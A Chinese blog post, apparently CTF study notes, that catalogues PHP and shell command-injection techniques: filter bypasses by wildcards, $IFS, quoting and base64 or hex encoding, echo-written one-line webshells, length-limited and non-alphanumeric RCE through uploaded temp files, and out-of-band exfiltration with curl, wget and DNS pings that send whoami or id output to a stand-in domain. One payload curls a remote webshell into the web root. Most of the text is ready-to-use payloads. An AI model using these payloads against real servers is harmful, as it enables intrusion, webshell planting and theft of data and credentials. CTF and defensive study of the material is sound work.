命令执行专题总结突破

最新推荐文章于 2024-03-03 12:21:44 发布
最新推荐文章于 2024-03-03 12:21:44 发布
阅读量1.7k 收藏 11
点赞数 3
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/110486072
版权

一.基础知识

shell骚思路
修复禁止

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} 
可以用dir和sort绕

1.)基础命令符号类

#①转义字符
windows中^
linux中\
#②多条命令执行连接的符号
windows中&& || %0a;
linux下 && || ; $() `` %0a  %0d
#③注释字符
windows下::
linux下#

2.)常见的命令类

读取文件的命令

#读取文件
highlight_file("index.php");
#glob() 函数返回匹配指定模式的文件名或目录。
#举个例子:
glob("*") 匹配任意文件
glob("*.txt")匹配以txt为后缀的文件
#打印文件的命令
print_r();

找文件命令
如找flag.txt文件方法

find / -name flag.txt
find / -name *.txt #查找所有txt文件方法
find / -perm -u=s -type f 2>/dev/null看看有s属性文件
#或者find / -name f{l,m}ag.txt/进行通配出字符
#结合grep命令一起使用
find / -name "*.txt" |xargs grep "www.dutycode.com"
#不知道为什么会出现
paths must precede expression: 类型的问题

查看linux内核版本命令

uname -a
dir d:\ #列出目录类

unix中常见命令

ll 列目录、文件(相当于Windows下dir)
pwd 查看当前绝对路径
wget 下载指定的url文件
cat /proc/1/cgroup 查看是否处在docker虚拟机中
#如果无ifconfig和无IP命令的话,可以利用proc文件方式查看
cat /proc/net/fib_trie
cat /etc/sysconfig/network

eval–>可计算某个字符串,并执行其中的的 JavaScript 代码
典型构造是执行代码

1.利用system执行的典型方法

eval $cmd
#即构造
cmd=system("ls");
#即列出这个文件的相关内容
system(“ls -al /etc/passwd /etc/shadow”);
cmd=system("cat flag_1171");
#骚思路
#绕过
c=system('cat f*');
#-->即代通配符方法读取思路
system("cat /etc/passwd")
<=>
"\x73\x79\x73\x74\x65\x6d"("cat /etc/passwd");
<=>
(sy.(st).em)("cat /etc/passwd");
<=>还可以用注释方法绕过
"system/*fthgb666*/("cat /etc/passwd);"
<=>
"system/*fthgb666*/(wh./*fthgb666*/(oa)/*fthgb666*/.mi);"
<=>
"(sy./*fthgb666*/(st)/*fthgb666*/.em)/*fthgb666*/(wh./*fthgb666*/(oa)/*fthgb666*/.mi);"

2.写一句话木马
利用echo代写一句话马

127.0.0.1 & echo "<?php @eval(@@\$_POST['a']);?>" > 3.php

二.常见绕过8种方法

①有字母数字rce

1)命令拼接

a=who
b=ami
$a$b //输出whoami

2)常用字符使用–>常用符号

&            表示将任务置于后台执行
;            多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块
&&           只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。
||           只有在 || 左边的命令返回假(命令返回值 $? == 1),||右边的命令才会被执行。
%0a          
%0d            
| (管道符)     |表示管道,上一条命令的输出,作为下一条命令的参数

echo qwe ; ls               //会先输出字符qwe,然后执行ls
q=l; w=s; e=" -al"; $q$w$e   //执行ls -al命令
qwe | ls                    //执行后面的命令,前面的不执行
#最常用;和|符号

3)linux中默认的字符命令

${PATH:5:1}    #l
${PATH:2:1}    #s
${PATH:5:1}${PATH:2:1} #拼接后是ls,执行命令
${PATH:5:1}s           #拼接后是ls,执行命令
#即直接这个命令即可完事

4)绕–>空格

#通用绕过
%20
%09
#linux下绕过
$IFS
$IFS$1
${IFS}
$IFS$9
<     比如cat<a.tct:表示cat a.txt
<>
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
#windows环境下绕空格
~10,1%
~表示为截取符,该语句的含义为从第十个开始截取且获取一个字符串


可以利用这种思路去写马
eval(file_get_contents("php://input"));

然后post
fputs(fopen($_SERVER['DOCUMENT_ROOT'].'shell.php','w'),'<?php @eval($_POST[123]); ?>');

在这里插入图片描述

5)绕cat

#代替cat方法
 cat
 tac
 more
 less
 head
 tail
 nl
 sed
 sort
 uniq
 rev
 od%09`ls` 利用转进制显示
 #代替空格的方法
 IFS$9、%09、<><>{,}、%20、${IFS}${IFS}
 #过滤了目录分隔符/ #利用cd执行到目录里后在进行绕
 #如
 127.0.0.1;cd flag_is_here;cat flag_5898818519729.php |base64
 #过滤了运算符|等
 #即不可以
 127.0.0.1;cd flag_297281061019145.php |base64
 #绕方法
 base64 flag_297281061019145.php
c=echo(`more%09f*`);
#绕隔离符类-->即|,;类
#可代这个-->注意直接输入到url编码中,防止被转义
%0a

6)绕过关键字

①单引号和双引号绕过
比如:ca’'t flag 或ca""t flag
②反斜杠绕过或者<<绕过
比如:ca\t fl\ag ca<<t
③过滤目录分隔符 /
可以使用;和cd到目录然后使用cat抓取
④拼接绕过
比如:a=l;b=s;a aab
a aab就代表ls
⑤编码绕过

wh\o\ami    //反斜线绕过
who"a"mi    //双引号绕过
whoa'm'i    //单引号绕过
whoam``i    //反引号绕过
echo d2hvYW1p|base64 -d|sh  //base64绕过,其中d2hvYW1p是whoami的base64编码
echo d2hvYW1p|base64 -d|bash//base64绕过,其中d2hvYW1p是whoami的base64编码
`echo d2hvYW1p|base64 -d` //将其base64解码,然后用反引号来执行命令
echo 77686F616D69 | xxd -r -p | bash //hex绕过,其中77686F616D69是whoami的hex编码
//$*和$@,$x(x 代表 1-9),${x}(x>=10) :比如ca${21}t a.txt表示cat a.txt    在没有传入参数的情况下,这些特殊字符默认为空,如下:
wh$1oami
who$@ami
whoa$*mi
#⑥借助文件中其他文件的字符串进行绕
如
test.php中存在该命令
<?php echo "hello,lemon" ?>
即可利用echo `expr substr $(awk NR==1 test.php) 1 1`
进行执行<

7)绕文件名

cat fl[abc]g.php                                 #匹配[abc]中的任何一个
cat f[a-z]ag.txt                                 #匹配a-z范围的任何字符
cat fla*                                         #用*匹配任意
a=f;d=ag;c=l;cat $a$c$d.php 表示cat flag.php       #内联执行
#利用正则:比如要读取etc/passwd
cat /???/??????
cat /???/pass*
cat /etc$u/passwd

8)绕过滤了system

system()#有回显
passthru()
exec()
shell_exec()
popen() 
proc_open() 
pcntl_exec() 
#反引号 
c=echo `cat f*`;

9)典型限制长度类rce执行
1.)15个字符

echo  \<?php >1
echo eval\(>>1
echo \$_GET>>1
echo \[1\]>>1
echo \)\;>>1
mv 1 1.php

2.)7个字符

1、命令+>文件名可以生产文件(命令可以为空)
2、ls -t可以将文件按时间顺序排列
3、sh命令可以执行sh脚本
4、base64命令可以避免特殊字符
5、\可以分行输入命令

w>hp
w>1.p\w>d\>\w>\ -\w>e64\w>bas\w>7\|\w>XSk\w>Fsx\w>dFV\w>kX0\w>bCg\w>XZh\w>AgZ\w>waH\w>PD9\w>o\ \w>ech\ls -t|sh

⑩绕system(“ls”)

#如果system("ls")被过滤了
可代php自带函数进行读取文件目录
shana=var_dump(scandir(“.”))?>

通配符读取flag思路

典型题型
过滤的源代码

<?php
if(!preg_match("/antsword/i",$_SERVER['HTTP_USER_AGENT'])){
    
    if(isset($_POST['shana'])){
    	$a = $_POST['shana'];
	
        if(preg_match("/flag|cat|;|more|less|\\$|\\|\*|tac|nl|od|head|&|<|eval|`|
{|assert|]|nc|curl|include|file|req|~|\^|=|:|%|sh|call|array|php|assert|find|ls/i",$a)){
                echo '<script>alert("还想读我的flag?臭弟弟!");window.location.href="index.php"</script>';
        }
	else{
	    
            ob_start(function($data){
            if (strpos($data,'JUST{') !==false)
            die('<script>alert("还想读我的flag?臭弟弟!");window.location.href="index.php"</script>');
            return false;
        });
                eval($a);
                echo '<script>window.location.href="index.php"</script>';
        }
 
    }
}
?>

读取思路类

shana=var_dump(scandir(“.”))?>#读取所有文件目录
#find命令如果被过滤,可利用绝对路径+通配符来代替命令,*被过滤了可以用?代替 ,find的默认路径在/usr/bin/目录下:
即-->find <==> /usr/bin/fi?d 
#又因为过滤了flag
#所以利用fl?g进行绕
#最后构造
shana=system(“/usr/bin/fi?d / -name fl?g”)?>
#绕cat读取
#如利用tail命令读取,即构造
system(“tail /usr/src/flllaaag|base64”)?>
#或者利用/bin/c?t 读取flag 
#即因为/bin/c?t<==>cat命令
shana=system(“/bin/c?t /usr/src/flllaaag|base64”)?>

没字母数字RCE

类型

①不用数字构造出数字类型
②不用数字和字母的shell
③非字母,数字的字符异或出字母
④非字母、数字的字符取反出字母
⑤php递增/递减运算符构造出shell
⑥不用数字字母下划线和$的shell-->即典型短标签的思路(即直接在短标签中构造常见的shell命令即可)

ctf中绕过字符数字构造shell
一些不包含数字和字母的webshell
无字母数字shell总结
不用数字字母下划线构造出shell思路

基础知识点

短标签
#如
<?=`ls /`;?>      # 等效于<?php echo `ls /`; ?>
原理:<?= 是 echo() 的别名用法
?><?=`ls`;   #构造原因<?= 还是不够的,需要先 ?> 把前面的 <?php

临时文件上传
#原理:们都知道php文件上传时,一般是将文件上传到临时目录,然后再将临时目录移到其它地方
#php.ini中的两个参数
file_uploads 是否允许上传
upload_tmp_dir 是默认的临时文件的保存目录(linux默认为/tmp)
#临时文件保存形式
默认为 php+4或者6位随机数字和大小写字母
如
phpXXXXXX.tmp 在windows下有tmp后缀,linux没有。


linux命令执行的另外一种方式
原理:linux环境下执行命令可以以文件形式存在
如aa.txt文件中-->cat /etc/passwd
即可./aa.txt执行这个命令

linux通配符

综合利用
如,题目

<?php
if(isset($_GET['cmd'])){
    $cmd=$_GET['cmd'];
    highlight_file(__FILE__);
    if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){
        die("cerror");
    }
    if(preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)){
        die("serror");
    }
    eval($cmd);
}
?>


①在/tmp临时目录下上传保存一个文件
#! /bin/bash

curl xxx.xxx.xxx.xxx > /var/www/html/a.php

②然后 
?cmd=?><?=`/??p/p?p??????`;
#原因-->临时文件会生成一个名为phpXXXXXX 的临时文件
因此利用p和通配符进行匹配
/tmp/phpXXXXXX这个文件

解法1
在这里假设flag在flag.txt中
通过POST提交修改这几行,可以得到flag

POST /?cmd=?><?=`.+/??p/p?p??????`; HTTP/1.1

Content-Type: multipart/form-data; boundary=---------------------------10242300956292313528205888

-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/sh

cat /flag.txt
-----------------------------10242300956292313528205888--

可成功get flag
在这里插入图片描述
解法2
通用解法
传一个文件进入到目录里
首先在example.com/a.txt中写一句话木马

<?php @eval($_POST['cmd']); ?>

然后post这个包

-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/sh

curl http://www.example.com/a.txt >> /var/www/html/a.php
-----------------------------10242300956292313528205888--

在这里插入图片描述
然后在post访问即可
在这里插入图片描述

三,综合利用类

1.)典型拼接写木马

利用拼接执行写一句话木马

127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php#没过滤空格和典型的关键字时可用
127.0.0.1 | cat 3122542822583.php |base64#即拼接进行base64显示,典型用于直接cat不出来的情况下

典型类型

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

即代分析这个整体类状况特点类–>综合分析

127.0.0.1%0acd${IFS}f***_is_here${IFS}%0abase64${IFS}f***_12451150247546.php

2.)命令执行无回显绕过

Vtest搭建源码
①http通道进行回显
即通过域名之间连接进行传输数据
windows下

外带命令
for /F %x in ('echo hello') do start http://自己搭建的Vtest

linux下
直接利用curl或者wget命令传输

curl example.com/`whoami`
wget example.com/$(id |base64)

②DNS通道进行回显

dns通道测试命令
ping -nc 1 test.example.com
#即表示命令的含义-nc windows下用-n限制数量,linux下用-c限制数量

#linux下外带
ping -c 1 `whoami`.exmaple.com
#windows下外带
获取计算机名
for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.example.com
获取用户名
for /F "delims=\ token=2" %i in ('whoami') do ping -n %i.xxx.example.com

③时间盲注

linux下利用sleep()函数
windows下利用&& ||的惰性去代

④写入文件,二次返回

利用>重定向符号
#将结果导入到web目录中去
如http://www.null.com/exec/3.php?cmd=whoami>test
#即将文件导入到web的test的去了
再次访问
http://www.null.com/exec/test

命令注入突破长度
远程执行rce漏洞
命令执行绕过案例

goddemon
关注
专栏目录
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1736
过滤了flag可以用*或者?绕过。
正则\绕过
nigo134的博客
07-27 477
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) { echo("forbid ~");.
linux 获取目录下 所有文件名 统计数量 写入 txt
nongcunqq的博客
06-27 329
【代码】linux 获取目录下 所有文件名 统计数量 写入 txt。
EasyBypass (;管道符)
qq_62046696的博客
12-23 1288
肯定要把file从命令中注释掉这种,以前接触过闭合然后自己重新构造一个🐎,但是这里好像管道符也可以使用;这样就成功闭合掉了,然后其实还有一个疑问就是我cat /f*的时候也能用,可是|\*|\。这个也就是给传入的参数加了一个引号包起来,然后往上继续查看过滤的字符号剩下什么。如果是 新生类的话,system那里应该换为 new a(b)这种的形式,分号还有,并且tac也没 过滤,flag被过滤掉了但是可以用?报错了查看信息是引号的问题,我们还需要闭合掉引号不然就变成了。就需要我们自己写入闭合。
临时文件上传无字母数字RCE
a3320315的博客
04-12 1806
题目分析 <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; highlight_file(__FILE__); if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); } if(preg_match("/\~|\!|\@|\#|...
淮安专版2020中考英语复习方案第二篇语法专题突破语法专题10动词的时态和语态试题20200519289
09-08
例如第9题,"Tom won't go to bed until his father comes back from work." 这里的 "comes back" 是用的主动语态,表示父亲下班回家这个动作是由父亲执行的。而第11题 "since it opened in 2016" 中的 "opened" ...
2019年高考政治考纲解读与热点难点突破专题04市场经济与对外开放教学案.pdf
12-04
专题分为市场调节与宏观调控的关系,以及如何以科学发展观引领全面建设小康社会。 首先,市场调节与宏观调控是市场经济体制中的两个核心概念。市场调节通过价格、供求、竞争等机制,实现资源的自发配置,优点在于...
专题十四现代世界各国经济体制的创新和调整实用教案.pptx
11-22
- 戈尔巴乔夫改革:1980年代,改革涉及经济和政治领域,试图通过经济管理方法代替行政命令,但最终导致苏联解体。 3. 罗斯福新政与资本主义的新变化: - 1929-1933年经济危机:由生产和消费的矛盾引发,特点是...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 882
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
前端专题技术总结
最新发布
nicky_hb的博客
03-03 1913
1 端到端 端到端流程是从客户需求端出发,到满足客户需求端去,提供端到端服务,端到端的输入端是市场,输出端也是市场。这个端到端必须非常快捷,非常有效,中间没有水库,没有三峡,流程很顺畅。如果达到这么快速的服务,降低了人工成本,降低了财务成本,降低了管理成本,也就是降低了运作成本。其实,端到端的改革就是进行内部最简单的最科学的管理体系的改革,形成一支最精简的队伍。 端到端的流程连起来的不只是两个紧邻部门,而是若干部门,是某个业务的全程闭环(businesscycle)。这个端到端的流程,从分析客户需求开始,到
超牛的pb打印程序(源码)可以自定义纸张
07-12
超牛的pb 打印程序,在pb9以下很好使,可以自定义纸张,但是在pb11.5中不太好使,哪位高手可以下载下来看看该怎么修改,我修改了好长时间也没有解决。问题应该是出在对外部函数的调用上,即ansi和unicode的问题,具体好像是nvo_prn里面的getprinterntdm函数。在pb11.5中需要修改 printerlist[li_i].is_PrintProcessor=string(lstr_info.pPrintProcessor , "address") 为 printerlist[li_i].is_Printername=String(blob(String lstr_info.pPrinterName, "address" )),EncodingUTF8!) 希望哪位高手看到并且能够解决这个问题,我的邮箱ytcola@tom.com。
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 1107
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 507
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
CTF中的Bypass命令执行
D.MIND 的博客
08-03 3153
linux命令敏感字符绕过 反斜杠: ca\t 1.txt 连接符——单引号: ca''t 1.txt 变量拼接字符: a=ca;b=t;$a$b 1.txt base64编码绕过: `echo 'Y2F0Cg==' | base64 -d` 1.txt 命令提示符$: ca$@t 1.txt //$@ 是传给脚本的所有参数的列表 ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数 ...
CTFshow命令执行29-123
qq_43534481的博客
08-06 1492
CTFshow命令执行WP
ctfshow web入门 命令执行
qq_50589021的博客
10-07 2742
命令执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ?> 考点: 绕过特殊字符的过滤 payload: ?c=system('ls');//flag.php index.php ?
ctfshow web入门命令执行部分(更新至56)
L1ni01
10-16 3523
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
PHP快速入门09-正则相关,附一定要学会的20个高频使用案例
黑夜开发者的博客
04-16 775
正则表达式(Regular Expression)是一种字符序列,用于描述一组字符串匹配某个模式或格式。它由一些特殊的字符和普通字符组成,可以表示一些特定的文本模式,如手机号码、邮箱、网址等等。正则表达式在很多程序设计语言中都得到了广泛应用,如Python、Java、C++等等。合理的使用正则表达式往往会使我们的效率事半功倍。^:表示匹配字符的开头。$:表示匹配字符的结尾。*:表示匹配前面的字符出现任意次数。+:表示匹配前面的字符出现至少一次。
Linux命令:查看文件内容cat|tac|more|less|head|tail|nl|od
weixin_33738578的博客
05-16 379
查看文件内容的命令;cat, tac, more, less, head, tail, nl, 1)cat 由第一行开始显示文档内容,一直显示到最后 2)tac 从最后一行开始显示,一直显示到第一行内容,倒着显示 3)more +文件名 一页一页显示,往后翻 4)less+文件名,一页一页显示,往前翻也可以往后翻,可以用PageUp键向上翻页,用PageDo...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值